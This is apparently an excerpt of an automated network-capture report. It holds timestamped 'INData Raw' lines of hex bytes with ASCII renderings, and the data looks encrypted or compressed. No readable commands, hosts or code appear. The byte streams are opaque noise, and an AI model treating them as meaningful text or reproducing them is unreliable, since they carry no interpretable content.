                                                                                                                                                    2022-09-29 12:59:02 UTC7255INData Raw: f4 d8 11 92 c7 01 19 af 60 99 5d ab 2f ed 4a ae 0c d2 55 53 f7 62 29 15 ec 14 1f 62 8b dd 9f a4 ef 9d 2b d2 bf 7e dc 89 8d 13 d9 8d ea 97 60 56 bd d0 cd 2a 38 6e 96 a8 2d 3b e4 11 c9 5c f8 41 a9 fa 6c 58 e1 bd d9 04 c1 a5 69 07 52 68 ea 41 03 fb b2 41 11 95 65 f6 a3 75 39 04 9c 97 e7 8f 1b 3d a7 d7 5c 4f c0 be 3d c0 d6 a8 48 e7 05 59 f3 26 e0 50 73 1b 11 20 ec 2c 6a 98 1c 42 22 e4 3c eb 4b 9d ee 41 31 ad ad ba 5a 6e e2 15 81 b5 73 36 c6 45 74 f0 9a fa ed ca 08 13 97 b2 3b 4b 71 44 ff b1 07 db 03 91 df 12 0b 25 4b 22 90 5a 4d 1b 3b a1 9c c1 31 d0 4d c6 47 91 3e 71 77 c5 1d a0 e7 10 6a 70 51 a4 3c 37 04 1d 9e 56 50 cc 10 c9 a5 fb 7a 78 97 18 34 9f f3 01 d1 32 9d 5e aa 98 ea e9 03 76 83 00 3b cb ae 63 a2 ac 75 19 a7 cd 54 e1 29 b9 5a f2 4d 9d e8 31 5e 3d fa
                                                                                                                                                    Data Ascii: `]/JUSb)b+~`V*8n-;\AlXiRhAAeu9=\O=HY&Ps ,jB"<KA1Zns6Et;KqD%K"ZM;1MG>qwjpQ<7VPzx42^v;cuT)ZM1^=
                                                                                                                                                    2022-09-29 12:59:02 UTC7271INData Raw: b6 05 95 c7 04 9e ef 4a 70 78 81 be 2a 41 56 76 53 25 4f 5b dd a1 d9 47 51 da 2e dc 13 54 58 88 c6 2e a6 7c 06 0e 57 ec eb 94 0b c2 0e 58 37 03 ce 41 7a 4e c0 57 88 14 ad 01 eb 8e 30 28 c4 35 e6 42 c3 6a 22 16 b8 db 4f 7f 9d c5 88 32 92 23 a6 a7 7e c9 38 46 95 67 6d 13 25 54 ad 37 e4 48 1b 1c ad c1 4a 02 74 18 11 a0 ef b3 42 89 dd 8e 46 8f 83 da 44 4d 1d c8 d0 e7 95 62 a1 17 74 62 9e 7f bd 1d 3f 6f f3 30 da 23 a8 ef 0b 00 67 28 95 3d b6 cc 1b 48 1e df 9c 2e 00 bb cd 44 3c 87 b9 fb 4a b2 36 c5 10 95 59 b0 26 53 52 5c a4 3c f3 51 e3 4a 64 bd 46 09 07 8f a3 7f 76 4b 70 33 31 0c d0 cb f1 17 67 6a 1d 99 07 c4 3f 82 e5 8e 03 7b 3e 0a 29 fe e8 dd 12 cc 44 67 52 02 97 d7 b1 cb c8 7e d6 5e 2e dd 91 81 28 70 9c 61 da 2e 18 83 64 ce 8c fa 31 c6 a1 a9 3a f8 6a bf d9
                                                                                                                                                    Data Ascii: Jpx*AVvS%O[GQ.TX.|WX7AzNW0(5Bj"O2#~8Fgm%T7HJtBFDMbtb?o0#g(=H.D<J6Y&SR\<QJdFvKp31gj?{>)DgR~^.(pa.d1:j
                                                                                                                                                    2022-09-29 12:59:02 UTC7275INData Raw: 56 36 26 b0 07 61 7a e5 cf 46 e3 9a 25 b9 94 48 8c 94 57 88 76 ef 36 c3 fd 37 f1 5b 54 b0 cf ae 16 9b 2c 07 a9 ca b7 e8 4e 6a da e0 e8 83 40 95 1a 11 b5 47 42 fb cc 6b 49 2d 7e b4 94 e1 8e 74 d8 fb f9 dc c5 13 26 9b 09 79 ad 3c af f5 d3 db 7b 01 ed 06 62 b8 03 dc a0 f8 ab 2d 0e 6e 44 10 00 1f 6e 3f b3 17 61 8f b9 3a 17 35 60 18 86 1c f6 cb bf e2 fe d3 00 49 01 36 e9 bf d6 84 76 54 4d 73 e6 bd 06 3a 31 eb df 02 ff 06 11 df c1 1a 81 bb d8 30 0e bd 05 52 cf 84 a3 2a 81 d3 a9 cd 61 b4 63 8a ba e7 a6 bc 84 b2 31 bb a8 87 88 af ff 48 15 3f c5 af 81 17 6e 60 f5 95 36 01 bc a9 ce ae 6e f8 5f 86 78 40 89 d6 f9 a2 f8 9e 68 72 16 07 4a dc 43 b0 9f ef 4b 3a 2d 7f ff 06 8a 7b bc f5 62 d1 a6 a6 7c cb 05 f4 6a 90 21 9a 02 ee 46 1e df 56 be 8b f3 fb df b1 6c 84 0a 79 09
                                                                                                                                                    Data Ascii: V6&azF%HWv67[T,Nj@GBkI-~t&y<{b-nDn?a:5`I6vTMs:10R*ac1H?n`6n_x@hrJCK:-{b|j!FVly
                                                                                                                                                    2022-09-29 12:59:02 UTC7291INData Raw: 8b c0 cc 1d 41 79 97 6d 7b 77 3c 62 9f 7f 57 6a 58 d9 a7 85 29 2a 44 9e fd e1 c3 85 85 22 ff 4c 14 a6 ef 9a 0b f3 1d 14 46 fc e1 f6 df 89 57 0c c0 d1 f5 39 4e b2 98 ec 5f bc b1 8a c0 9c 1f 27 68 c6 ed 8f ce 1f 4f 10 c8 00 86 ef c4 2b 6a cc b1 bc 30 7a 3e 75 1d c5 1f 6b af f3 77 e0 5b 16 68 ef 7e 2e 4d 2a 0b 14 4b a6 5e 0b a1 6f ec bb 7d 0f 1d cb b2 71 2a 91 2a 0c fd 28 27 87 68 c3 b2 d6 a4 d2 fd e0 b0 14 3e 07 bf 50 e0 1a e9 7d 17 11 21 ec 7d e4 33 3a 45 a9 90 d7 08 69 b2 38 b2 6a dd 19 2b 03 af ca 08 b9 10 9f 32 36 42 e5 81 f3 2c c1 9a 28 61 07 b2 f6 32 81 e6 47 c7 d6 fe 79 fa af f3 f1 36 73 90 8c ce d8 32 77 9c 0d 65 6f 33 68 62 46 ce 28 01 69 41 ae 13 95 5f 75 5f e0 2f 36 a2 5e ac 71 2f ef 23 90 7e 04 3d 7e 80 9e c9 79 18 5a 90 46 cd b0 24 36 fd b0 78
                                                                                                                                                    Data Ascii: Aym{w<bWjX)*D"LFW9N_'hO+j0z>ukw[h~.M*K^o}q**('h>P}!}3:Ei8j+26B,(a2Gy6s2weo3hbF(iA_u_/6^q/#~=~yZF$6x
                                                                                                                                                    2022-09-29 12:59:02 UTC7307INData Raw: 30 47 68 29 2d cf 2c 18 e5 71 f2 f4 94 a6 3c 75 61 d6 28 80 7a 33 d5 7f cf c0 25 26 5e b9 1e 0d 13 5d 86 11 da 16 fc 22 64 e5 16 a3 1e 61 d1 08 37 2c fa 37 ac f6 9d 60 dc c6 6a f4 18 96 c5 cd 55 4c 77 c9 2f 78 38 0b b2 fe 86 14 ca 0e 00 fc 3e ca cb 38 c7 ac a9 67 a9 c0 5e 92 65 87 3e c5 d2 6d 02 b6 fe 0f 07 e9 9c 38 1a 43 fb 10 43 2b 1d 9a 7d 06 32 93 95 6b f2 71 d1 98 5b 62 94 27 57 6d f2 e9 3b cb 4c c7 13 1f 1a e8 2c 94 d4 de 36 fe c5 c9 ae 92 a8 aa e5 c8 4d cb 80 4e 8e fc 4a d2 f8 21 53 46 7f 10 d9 51 11 56 3e 17 30 ea 0a 7a 34 3d b1 12 4f f6 76 fd 6e cc 43 93 a4 5e 80 d7 75 b3 a0 a1 b9 e7 2f ad 16 58 88 44 f4 6a aa d0 d3 81 93 3e bd cc 56 0e d6 b1 3f 64 48 1e e1 0b 38 82 36 80 b6 a5 6a de 99 f5 83 ff 6f ad e9 fb ee 9e 0b 52 46 c2 7b f3 97 e1 b8 e2 26
                                                                                                                                                    Data Ascii: 0Gh)-,q<ua(z3%&^]"da7,7`jULw/x8>8g^e>m8CC+}2kq[b'Wm;L,6MNJ!SFQV>0z4=OvnC^u/XDj>V?dH86joRF{&
                                                                                                                                                    2022-09-29 12:59:02 UTC7323INData Raw: ed 79 c2 a4 68 a9 57 0e 5f a2 35 a8 1d 31 0b ea 15 98 8f 1d 6d bd 85 8a 2c 0f e3 7c e2 3c 7f 53 53 ab 9e 8b 3f 51 98 07 97 91 ab 16 fd c2 b6 5d d9 c4 c6 65 df 3c 41 51 03 13 57 11 44 c9 59 04 31 b2 6c 30 78 6a dd 10 51 33 c8 64 bb dc 95 a1 41 d8 b8 5b 17 68 c8 ff 39 d6 a1 92 61 3c ec d0 f4 43 de 8e f5 ff 73 99 53 6c 77 c6 5a 88 e7 f1 67 c5 03 a5 53 14 f1 a1 07 a8 e8 f3 c1 0d 02 10 fe 13 a9 8c 46 25 8e 67 fc 7d 71 93 f4 87 7d f2 e8 58 ec ec d3 c2 42 ab 66 a1 04 0f ee 13 53 af 47 15 1d 4d 82 20 67 bb be 0e 01 13 61 2e b9 9c 03 37 79 e2 03 f4 6a a7 ed 1c ae ca 9d c4 95 24 9a 5b 06 f4 86 99 2e 66 13 0b 55 c5 f7 7d 71 d8 80 3b b2 5a 5a a1 22 7d f8 81 1a 68 4b 8e 7f c1 7f 79 49 ff 18 ca 04 5e e1 d5 30 75 6f b0 e0 94 2d cf 53 b0 8b 6d f9 65 3a 59 b7 c3 04 59 4a
                                                                                                                                                    Data Ascii: yhW_51m,|<SS?Q]e<AQWDY1l0xjQ3dA[h9a<CsSlwZgSF%g}q}XBfSGM ga.7yj$[.fU}q;ZZ"}hKyI^0uo-Sme:YYJ
                                                                                                                                                    2022-09-29 12:59:02 UTC7339INData Raw: 11 e1 d6 32 ec 6f 70 e0 df 35 d0 29 ad 33 9c d1 68 fd fe 2c 37 01 37 20 19 b5 43 40 f9 0b 3f 13 b5 dd 2c c7 97 ff 79 f2 32 ab 17 47 a1 b9 83 bf b0 2e 4f 92 86 51 95 a1 52 b3 cd b9 0f e8 b2 4e b2 ac 91 7b 6b d4 f9 43 72 c2 ac c1 5c 22 dc 8b 0f d7 38 5f c0 88 8f 57 c8 89 b4 28 e3 19 82 b4 bb ba 93 db 62 97 f3 e1 6a 1c c6 ca 8f 5b a8 43 cc e7 2d 8b 7c 64 ba 18 db b8 a6 fb ad dd 08 c5 d7 9d 17 d0 80 3c 1a b3 65 01 ad 2f 17 cb 02 58 77 27 7b 86 1b 60 53 29 9c f8 37 24 b0 28 a4 1f 5d 91 26 02 64 be 00 26 a9 98 b8 03 8c b0 c9 3d f4 42 30 0b 59 e8 2e a0 83 61 e8 c6 4f 7b e5 59 ed 94 ad 24 42 87 9f 39 23 af 66 46 a6 e7 34 58 8d 43 9a a2 99 09 97 06 d9 57 c9 c8 e6 79 a3 c2 da 13 f4 5f 31 d0 e8 48 f3 41 fd 9a 8e 73 5a 05 b0 e4 88 b8 e0 7d 3b 74 eb 12 dc 42 71 b2 e2
                                                                                                                                                    Data Ascii: 2op5)3h,77 C@?,y2G.OQRN{kCr\"8_W(bj[C-|d<e/Xw'{`S)7$(]&d&=B0Y.aO{Y$B9#fF4XCWy_1HAsZ};tBq
                                                                                                                                                    2022-09-29 12:59:02 UTC7355INData Raw: d8 03 07 a9 22 99 1d cf 9c a5 7d 6a bd 81 98 8d 55 df 7a 0a 54 07 b3 83 3f 1a 31 66 b3 b1 dc 88 76 33 bc c1 de 2c 35 62 84 8b e4 bb 59 92 81 da fb 8f e8 a6 a0 d2 a9 9f 50 64 07 3f 1b fd db 31 6e c2 7b 63 1d cc 71 6e 90 41 fc 8d a1 bf c1 a4 30 a0 e2 6c 3c eb a0 be 16 b3 71 cf d4 60 d2 96 cd c7 ce ec d4 ac f0 f2 2b 68 93 05 be 0b 11 37 5f 78 d9 07 98 5c 2e 10 4b 97 a0 13 03 2b c2 fd 26 68 59 b2 f4 81 60 81 3f 57 fa 47 c0 0f 28 d5 c4 e8 a4 45 8a ba f9 c0 26 e4 fd e3 95 d0 80 e9 d9 e5 71 4e 4d fa a8 4a 98 0b 7a ae 6c c8 41 25 56 f5 c5 b8 c9 59 0a 06 4a 7b 6a 4e ff d2 51 b7 5d 8d 97 df b9 12 7d c6 9c c7 10 4a 2b 57 01 61 be d2 17 e8 1a 8a b3 63 f6 25 25 52 93 cd ab d6 f5 64 50 ef 8c 56 6b 31 ff 62 80 87 70 28 43 6e f1 56 da bb e7 5b d6 a4 26 eb 8f 23 5e a0 90
                                                                                                                                                    Data Ascii: "}jUzT?1fv3,5bYPd?1n{cqnA0l<q`+h7_x\.K+&hY`?WG(E&qNMJzlA%VYJ{jNQ]}J+Wac%%RdPVk1bp(CnV[&#^
                                                                                                                                                    2022-09-29 12:59:02 UTC7371INData Raw: e2 20 45 59 f5 d6 d2 e8 2f 8c ae ab 38 a1 31 fe 3c 0c 82 9e ba 97 b4 40 ea 47 b0 f2 ad 54 b8 1e f1 4d a7 b3 5e 5c fa 9b ae 67 27 c6 3f 42 6d 3a f5 5c a5 aa ef 6b 02 37 d1 39 05 84 11 2e 61 ad 39 ba a0 3b ce cb 76 01 8a d4 20 63 0e eb 78 b2 50 c8 0e 75 62 88 60 5d db 74 3f c8 47 c8 d5 0c a2 67 45 d2 25 cd 91 a4 0c 9f 17 b7 f7 38 d8 9d ff af 7b 86 cb 23 6e af c6 66 eb b2 eb 62 8b a3 1a 60 a0 9c cc fc 96 ba dd c3 0b cc c0 19 bf 2e 13 94 e0 2a f1 fd 99 f7 7f 19 e1 07 a1 19 73 b0 ee 26 65 57 cc 45 00 3c 63 d0 71 2f c9 62 5c 3d 7d ce ae 10 f2 9b 80 9e 6a 83 dc 83 e5 39 6a 13 90 83 49 c0 13 86 32 b6 1d a7 e5 f5 fd 1f 46 ce d6 39 d5 81 3b dd 21 59 20 f9 e9 cd 81 1c 43 05 52 0d 57 9a 81 28 2f 05 21 6a db 26 55 93 05 9d 33 52 4f 2a d3 53 06 04 fa fc d6 dc 79 04 81
                                                                                                                                                    Data Ascii: EY/81<@GTM^\g'?Bm:\k79.a9;v cxPub`]t?GgE%8{#nfb`.*s&eWE<cq/b\=}j9jI2F9;!Y CRW(/!j&U3RO*Sy
                                                                                                                                                    2022-09-29 12:59:02 UTC7387INData Raw: f0 58 b7 46 fb a2 9d ae ca d2 95 1a 43 35 c6 38 75 16 c1 65 ef 90 c2 fb 8d c8 6d 02 48 cd f3 60 dd 5d 34 4a f4 65 c7 1d 4b b3 d3 0c 42 7d 54 98 89 73 53 5e 9e 40 21 c9 1c 96 29 5b ec 7f d9 88 33 6e 40 bc 74 17 d1 57 31 51 d8 67 f8 3a e4 c0 71 49 29 c1 f2 c7 ba 9c 7a 75 81 64 a3 9d 24 2c b9 38 cd e0 98 b3 7a 40 d6 9f 67 1f d1 83 33 1c 4d d2 aa 8b 66 43 8f f5 5f c5 2d 95 a9 47 45 07 ea 37 71 88 1d 21 ca b9 84 e9 78 d1 a6 53 b0 3e b8 18 fd 29 54 4d b6 87 d0 91 75 0a 43 a3 dc f9 8a 3c 55 9f b4 60 7a d8 4d 5b 9e a6 80 f3 04 4e c0 c2 90 ae dd 14 25 b8 d6 f0 af e8 f3 ac b3 93 5c ac 08 5e a6 d5 e6 db ea f2 ee 02 f3 e7 45 22 51 58 dd e6 f9 a0 3c e6 6d ac 11 4b 5e 72 81 44 d2 c6 f8 bf 41 28 df b8 2b 9e 70 4d 3c 54 0a 91 c2 4f 4c b6 4d 91 0c 7c 1c e6 26 18 36 b1 cc
                                                                                                                                                    Data Ascii: XFC58uemH`]4JeKB}TsS^@!)[3n@tW1Qg:qI)zud$,8z@g3MfC_-GE7q!xS>)TMuC<U`zM[N%\^E"QX<mK^rDA(+pM<TOLM|&6
                                                                                                                                                    2022-09-29 12:59:02 UTC7403INData Raw: a2 98 ce bc b8 fa 8e 7d 1c 59 e7 23 55 24 7b 96 fd ef 26 b6 e2 10 0a 33 91 10 ef 18 c9 3e b1 7a 6e 4c ae 37 fa 4a 77 85 c1 98 ad df e3 b2 4a 43 3a cb 58 c7 b0 d9 10 f7 be 3c 58 0b 4a 7e 3d 9f 5b 69 e9 c8 a7 ed d1 94 7a ff 28 b8 a8 2c a1 0b 22 09 c7 ba d4 a9 d9 22 cc 5d 07 c3 85 40 d7 58 6e 96 b0 1a 63 54 2e fa 06 f8 3a 7a 77 20 cc 88 98 fb a3 1a 31 f8 fc d7 ee 89 3d 56 7a 97 06 82 73 66 6b a5 c6 be 69 d2 f5 4b 0f f1 40 a9 73 22 2c 6b e7 a4 66 a2 f2 78 ca 93 4c b9 68 b5 ac 75 02 27 e5 69 30 fe ef 1c 2b 4d c2 24 21 55 7a 17 5f 9b 69 b5 07 54 92 2e 0e e2 49 17 cf a7 49 02 24 72 1f 95 d8 e0 b9 0c 50 a1 c1 8f f3 60 52 7c 05 69 21 cb 7e aa bb 2e a7 b7 b7 0f 18 7e f4 94 15 5b 19 14 7c 29 de 97 20 c3 4e 87 e1 4a 21 ca bb e0 1a 4b 2a 7c 54 74 65 2a 11 ea 70 b4 d5
                                                                                                                                                    Data Ascii: }Y#U${&3>znL7JwJC:X<XJ~=[iz(,""]@XncT.:zw 1=VzsfkiK@s",kfxLhu'i0+M$!Uz_iT.II$rP`R|i!~.~[|) NJ!K*|Tte*p
                                                                                                                                                    2022-09-29 12:59:02 UTC7419INData Raw: 8d f6 5b e6 b1 37 80 81 25 88 5f 76 ac d3 db 6e 4b 6d 8d f8 1f 6f 37 c6 6b 65 75 c7 83 c8 95 9a 27 5f a1 7a b6 c1 e6 e1 45 a8 27 3f b0 8b e1 5f 80 5f 27 d7 c4 eb 7f 7d f6 e7 6a 41 3c de d6 b4 b4 fd 94 69 7e 19 78 3c 2a 9f 7b e4 4d 54 55 fc 2e 58 4d b0 96 6c 2d b6 03 c0 ee a3 56 99 19 41 b3 a7 3b a4 9e 78 13 74 9e 44 ce 82 f7 f0 74 f3 dc 74 2d 36 bb 97 52 9b 44 27 9c 97 5d ac ec 8f 34 ac 88 b3 2d 2c 3b 9a 86 2c a2 af 6a fb f3 bf b9 76 d3 73 31 11 7b c0 28 ca d4 38 49 c6 c5 3b d7 a9 fb 4d b7 04 f8 06 d2 2b 34 88 3b 37 08 5c 36 97 bf 6f db 60 ef d0 37 ea cc 5b c0 4d 69 e2 33 fd 22 6b df 4d b5 a2 eb 23 9c ad 46 f7 39 6e 2e f5 50 6b 65 27 df 56 6a c7 42 e4 81 d7 fe 60 7d cf b1 b3 33 a4 4d d9 de 2a 41 5e 4c 1e 99 f6 dd 99 61 87 05 6a 81 72 b1 b3 28 33 2f ab 0b
                                                                                                                                                    Data Ascii: [7%_vnKmo7keu'_zE'?__'}jA<i~x<*{MTU.XMl-VA;xtDtt-6RD']4-,;,jvs1{(8I;M+4;7\6o`7[Mi3"kM#F9n.Pke'VjB`}3M*A^Lajr(3/
                                                                                                                                                    2022-09-29 12:59:02 UTC7435INData Raw: d9 e5 36 40 ba 56 6a 3f 12 dc 56 10 03 db 8d 93 1c fd 03 f4 8a 13 58 6d d1 49 aa 4b 21 08 e3 67 6f e3 54 ef ad 06 7b de fa 86 64 59 23 bb ca 72 32 76 64 5c 85 6c f1 42 ee d6 9a 4e 75 69 51 53 0d e6 f8 2a c7 a7 36 98 e5 f3 56 06 72 cb 21 60 14 cf 58 01 4a 99 9b 2a 7a 07 b8 43 1b 8c c6 d3 dd 56 f7 f4 27 9a 9d 01 d8 5c 15 98 d4 e3 6a ef 45 97 21 9e 71 da 44 6f 61 a0 8b f8 69 27 bd 36 da 3c f7 52 2c c6 fd 1e 5f aa 90 cf 6f a7 fc 42 11 dc 3b 14 53 be c9 ba 8b d7 74 1d af ae f2 35 db 8a 60 94 33 e8 cb ff 00 10 00 bd 8a 27 64 b4 5a a3 4c 65 b4 3f bd 81 85 bc 7f 36 f1 20 e9 d8 9c da b4 c8 24 61 09 bd 71 24 f1 55 45 ae f8 95 59 e2 4b d3 40 6f 61 33 4a 26 37 75 e5 89 4a 8e e4 b2 ec c0 16 08 84 16 02 d7 41 4c 0a 24 7b 92 6e bc bf c3 a2 90 1a 45 6c c8 69 79 78 2a fa
                                                                                                                                                    Data Ascii: 6@Vj?VXmIK!goT{dY#r2vd\lBNuiQS*6Vr!`XJ*zCV'\jE!qDoai'6<R,_oB;St5`3'dZLe?6 $aq$UEYK@oa3J&7uJAL${nEliyx*
                                                                                                                                                    2022-09-29 12:59:02 UTC7451INData Raw: cd 2b b9 42 f9 ad 63 fe cd fb dd 58 0d fa 52 0c 19 e7 9f 9d 98 e2 84 6e 8d 6e bf 78 17 fe d4 c2 ea a0 ab 64 e0 9f 6a 15 b3 bd 7b 73 8c 5c 01 cd 87 67 bd 7f e2 4e f5 e4 2c 95 45 e4 5e 8f c0 c5 c0 b6 41 6f 4d 8b cc f4 dc 96 b7 25 d4 c3 70 fa 62 42 ef fd c7 8c f7 79 ac 18 aa 26 f0 17 41 ed c7 bb ff 8a a2 3b c3 fd 44 37 0f 84 91 47 e1 84 f3 23 8d 98 ff f6 56 88 34 63 b3 3f 13 90 ca 13 69 03 e6 73 4b 31 8b b9 81 29 5b 12 80 7a ee bf 52 c3 b8 cf 17 d0 e2 0f a5 ba d4 b4 f6 e7 16 c4 e4 72 a7 90 f2 e5 33 ae 69 90 0f c8 db 64 a7 64 e0 fd 52 de 52 1b 9a 97 ee eb ad 22 b0 20 e4 dd 40 e8 29 e5 8d e0 64 c2 d5 e9 e3 29 0a ef 67 3e 9d ed 8b bf 90 4e 5e 7c 22 f2 ec 41 69 e8 03 0f b8 ea dd cb 55 19 e6 12 02 69 64 08 a0 ea c0 57 f1 80 50 f3 ae 80 d1 65 2b 6e 74 b4 28 d3 cb
                                                                                                                                                    Data Ascii: +BcXRnnxdj{s\gN,E^AoM%pbBy&A;D7G#V4c?isK1)[zRr3iddRR" @)d)g>N^|"AiUidWPe+nt(
                                                                                                                                                    2022-09-29 12:59:02 UTC7467INData Raw: 4c 49 92 e9 02 dd b2 bc 77 27 d4 b6 09 ad 7b f5 58 7c 32 99 52 7e 3f 3c 5d c2 85 d0 09 b6 79 b1 e3 56 66 8e 74 90 71 90 ea 60 ed e1 fb ce 54 73 d1 c4 f5 a8 1c ae f5 9f 3d c0 5f ae 1c b5 6a b6 45 de 09 c1 3b 99 4d 67 36 28 f4 6f da 5e 43 a3 1e 91 49 3f 0a 3c 38 1a 87 9f e9 8d 1f e1 0a 68 75 6f cd 85 5d 63 db 6a e1 3d 10 5f 1f 56 c8 de 01 d5 6f 25 77 db 19 57 2c 88 67 64 4e e9 d6 75 13 29 86 64 f2 e1 3f ec be da 2f f6 c5 56 41 ce 26 62 0a c1 4f c9 59 ec d2 1c 17 b8 fe 37 d6 4a 15 c0 e7 3d 4a e3 58 2f 4b 42 c1 3a 34 45 fc 25 e0 92 3e 6b d8 96 8e 4e 32 76 76 de 38 2a a6 19 b4 0a dc 93 5c 73 13 d0 ce de 52 1a b2 1d f0 19 83 c5 fb 9c 7f 08 8a d1 17 06 cb 2e 56 18 b5 ed f0 4d c5 65 85 05 c4 f4 48 04 68 53 13 92 0a b2 fd 36 5f 8f d9 b1 93 de ca c2 9f 20 a2 bf 55
                                                                                                                                                    Data Ascii: LIw'{X|2R~?<]yVftq`Ts=_jE;Mg6(o^CI?<8huo]cj=_Vo%wW,gdNu)d?/VA&bOY7J=JX/KB:4E%>kN2vv8*\sR.VMeHhS6_ U
                                                                                                                                                    2022-09-29 12:59:02 UTC7483INData Raw: b6 cb 1b ba e6 ff f1 c0 8b 00 85 9a 52 3d 8b ad 9e 44 06 69 ab c3 b4 6e c7 28 48 15 e5 13 3d 2b ac 08 a9 4c 68 8d c5 43 37 8f 85 05 82 30 16 0f 83 67 2b 18 8d ce 40 10 3d 0f 21 ce 50 67 f8 c9 a4 94 fb 64 15 a0 a8 0a 54 c0 9b b8 34 47 15 4e 7d aa 63 5f 22 48 6e 33 e4 9d fe 6a 15 ae 02 36 69 42 ee 00 f4 a3 ff 53 b1 4e 9c 7d 99 06 db e7 7d e2 8e 9e d1 75 7e 46 0a 2e 09 c7 e9 8a a1 d1 7b fd 8e 17 4a 9e 88 e5 ea fd 4d c2 8c 30 4a 43 aa cb 05 2b 8c 65 1e 3e f5 4d 36 32 90 c4 1a 1a 32 96 9d 60 4e 1b 28 85 dd da 74 5e b6 3b 45 ea 04 61 8c f0 b7 8d 69 f8 13 bb dd 2c e2 40 3d d0 48 b7 f7 2f 6d 61 14 4c e2 5f 7d 83 30 e6 62 e5 61 c7 ad b4 87 84 4d 46 a4 0e d2 2e e9 70 7e cd c9 8d 4c b6 6f 5c 41 ab 5e d9 67 a8 f1 11 31 ee a9 4b 49 b9 f1 99 eb a1 f3 bf f7 05 a3 1e f1
                                                                                                                                                    Data Ascii: R=Din(H=+LhC70g+@=!PgdT4GN}c_"Hn3j6iBSN}}u~F.{JM0JC+e>M622`N(t^;Eai,@=H/maL_}0baMF.p~Lo\A^g1KI
                                                                                                                                                    2022-09-29 12:59:02 UTC7499INData Raw: 72 33 71 1f 98 10 39 b3 cf 49 26 e1 63 19 c5 49 cc 03 e2 6d 49 b8 57 aa 0e 34 2d 49 9d 34 f8 31 c3 7f 99 98 bb 2a bf fb 2b 75 6e 63 6d 2d 1b 1e c6 26 d9 2c 1f 39 70 3a 0f 6a b4 0f 34 ec 43 89 75 e5 98 cc dc 69 2f 36 af f0 a9 12 72 a2 4d ff 8c 1d 77 bd 8e 8f 46 b6 1b 0b 9a 30 40 9a cf 9d 95 76 16 dd 7a 18 5e b7 f1 62 b1 a2 b3 17 90 22 a8 61 93 45 c2 40 6f 17 ef 28 97 2c b3 ea df d5 85 34 07 99 98 3b f2 93 17 2b 05 c1 b8 7f f4 7e 63 76 9e 0e 93 88 d5 ab 22 2b 34 46 b0 e3 66 d9 e4 f1 93 53 24 82 17 f1 94 d2 b4 e7 33 2b 26 61 e3 7c bc e0 5e 23 8c 1b 31 91 a4 fe b5 a8 af 33 fd 12 4f 13 58 fe 31 6b bd 67 05 85 3b 4c e9 98 21 d7 3c 50 10 98 51 12 1e a9 3e dd e0 9d 12 d9 88 98 26 dd 57 af 4f 18 e1 00 39 f9 55 a8 df 4b 4f 5b 96 ef 75 f5 40 5b 7a 5a 2e 01 25 6a 69
                                                                                                                                                    Data Ascii: r3q9I&cImIW4-I41*+uncm-&,9p:j4Cui/6rMwF0@vz^b"aE@o(,4;+~cv"+4FfS$3+&a|^#13OX1kg;L!<PQ>&WO9UKO[u@[zZ.%ji
                                                                                                                                                    2022-09-29 12:59:02 UTC7515INData Raw: 71 de 28 2f a1 8a 5a 62 50 55 bd df eb d2 d8 53 19 c9 10 19 94 e1 d4 50 fd e1 cc d4 6c 10 5d f7 c9 70 97 70 82 c4 27 8b 56 1d f2 20 dd 71 70 87 68 89 6d f2 ca f0 6d df 50 66 04 c7 b8 6c 7a a5 e1 47 48 2d af f3 b8 a5 35 ff f8 6e 22 c1 a9 09 5f bd 5a b3 57 43 8e 25 d0 0a f9 47 bb 38 fd 4f 7a 98 36 0a 4c 9f af 18 9b 51 6f 85 7a fa 27 17 a9 ef 0e de 0a 51 0a f0 6b cf 1b e5 d7 f5 43 9c b5 c9 77 18 74 95 d4 26 80 52 e7 79 05 df da 8d cc 57 93 21 c9 d8 4a 07 ff 4c 40 2a 99 80 66 ed 9d e9 99 67 bd 4f 77 b4 44 29 5d 0d 0d f7 29 09 0c f7 ef 64 3b 39 7b ef f4 f6 e4 a4 bb b2 3d cf fd bd 7b e2 95 77 4b f3 5b 09 61 ef 71 fd a0 4e 73 52 f7 db 7f ff 27 1a f0 18 c2 53 8a bd 0e ee e7 8d 48 1c 56 c5 85 e9 49 c0 a1 44 ea 75 72 e8 5e da 56 27 10 96 48 5b b9 e4 fc ab d2 04 a3
                                                                                                                                                    Data Ascii: q(/ZbPUSPl]pp'V qphmmPflzGH-5n"_ZWC%G8Oz6LQoz'QkCwt&RyW!JL@*fgOwD)])d;9{={wK[aqNsR'SHVIDur^V'H[
                                                                                                                                                    2022-09-29 12:59:02 UTC7524INData Raw: 55 7c f7 37 4a 6d 37 22 b0 21 eb 9c 57 6c 02 bf ec b5 8e aa 24 88 08 7a eb 8d cf fd 3b e1 83 6b fd 69 37 5c ce bb 09 78 49 85 4d 29 9a e9 ce 1e e6 00 46 63 48 b5 15 31 ca 2b c1 24 8c 52 a3 ab ea b2 02 79 64 15 20 7d ec 31 11 18 86 f1 b6 8b a8 19 b9 0f b8 1f 90 70 91 79 08 c4 b5 25 bf b6 06 59 d5 61 a6 01 2c c7 3d e5 6f 65 db 95 12 6a 4f ff ef de e1 c4 9e dd 9d c9 3c 1e fa 80 ad 5c 88 80 bc dd 9d bd 15 2e 63 9a bd 86 e1 ba 1f c6 7a 79 63 89 81 d2 ff bf 74 24 a9 e1 43 15 76 58 70 2f 27 b1 0a 03 d6 6a ac 75 ca f1 d7 b9 a2 d7 2b 74 5f 24 21 c7 53 9b 99 59 fd 13 61 38 df e0 2d 6b 9d fd 55 68 a2 50 0f 5f af 77 07 42 b5 f7 ba 0b ff 7d 46 9a 82 84 ea 7e c6 cc ba 31 2c 9a 21 e5 9b 73 7c 33 7f 89 31 5b 67 36 95 f9 65 4e c6 f8 74 d3 ea 7e 86 d2 67 cc 97 81 0c f1 a6
                                                                                                                                                    Data Ascii: U|7Jm7"!Wl$z;ki7\xIM)FcH1+$Ryd }1py%Ya,=oejO<\.czyct$CvXp/'ju+t_$!SYa8-kUhP_wB}F~1,!s|31[g6eNt~g
